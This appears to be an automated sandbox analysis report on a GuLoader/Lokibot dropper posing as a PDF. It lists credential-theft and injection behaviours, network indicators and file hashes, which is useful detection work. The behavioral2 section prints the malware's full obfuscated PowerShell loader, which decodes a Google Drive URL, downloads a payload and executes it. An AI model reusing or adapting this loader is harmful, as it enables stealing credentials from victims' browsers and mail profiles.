Malware Analysis Report

2024-11-30 23:47

Sample ID 240916-v5cn4szhra
Target 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5
SHA256 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5
Tags
guloader lokibot collection credential_access discovery downloader spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5

Threat Level: Known bad

The file 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5 was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_office_path

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-16 17:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-16 17:33

Reported

2024-09-16 17:36

Platform

win7-20240903-en

Max time kernel

141s

Max time network

144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2592 set thread context of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Windows\system32\cmd.exe

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.179.227:80 o.pki.goog tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/2800-4-0x000007FEF51CE000-0x000007FEF51CF000-memory.dmp

memory/2800-5-0x000000001B480000-0x000000001B762000-memory.dmp

memory/2800-6-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2800-7-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-8-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-10-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-9-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-11-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-13-0x000007FEF51CE000-0x000007FEF51CF000-memory.dmp

memory/2800-14-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S8GLL22IVFO47NAK40NX.temp

MD5 adb2d06a7a86a0ee824adf165f581ad7
SHA1 a86b976e00f863b1b837725f28d2c630cc72cb4e
SHA256 46e65a65f616cd1229ce087437ddf84fe440779b9158196230930269a0ac0ca1
SHA512 9c3a2f16fc524c2e503915b028849580207765e5dcf074e5abfe2a7da0e8c556727c4e545b52c5a4d0e24013fb0ac1eb435646d9b6073d44aa231198dafb14a0

C:\Users\Admin\AppData\Roaming\Nonapostatizings.Non

MD5 762077e498d7a658ee381fcfaf25d060
SHA1 26410bd382fe84fedeec847889e22f4bb1964931
SHA256 7fa884749148a539e45b787679fe8524daf7f7d8c4c4db6207a60932ab7e7a79
SHA512 60aff6624dca974f03fb57b78408f2505fd2878cbaeaf9a05a434344984c7c373424e3bb30f90db7c800f56100b7bc3cb316b57d3128266accdfbb3a0a2a1c76

memory/2800-19-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2800-20-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2592-21-0x0000000006620000-0x0000000008BA3000-memory.dmp

memory/2376-22-0x0000000000590000-0x0000000002B13000-memory.dmp

memory/2376-44-0x0000000000590000-0x0000000002B13000-memory.dmp

memory/2800-45-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-16 17:33

Reported

2024-09-16 17:36

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4332 set thread context of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4920 wrote to memory of 5036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 5036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5036 wrote to memory of 4624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5036 wrote to memory of 4520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5036 wrote to memory of 4520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4520 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4520 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4520 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4332 wrote to memory of 2452 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4332 wrote to memory of 2452 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4332 wrote to memory of 2452 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4332 wrote to memory of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4332 wrote to memory of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4332 wrote to memory of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4332 wrote to memory of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4332 wrote to memory of 1676 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki 
kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . 
Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs 
Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Windows\system32\cmd.exe

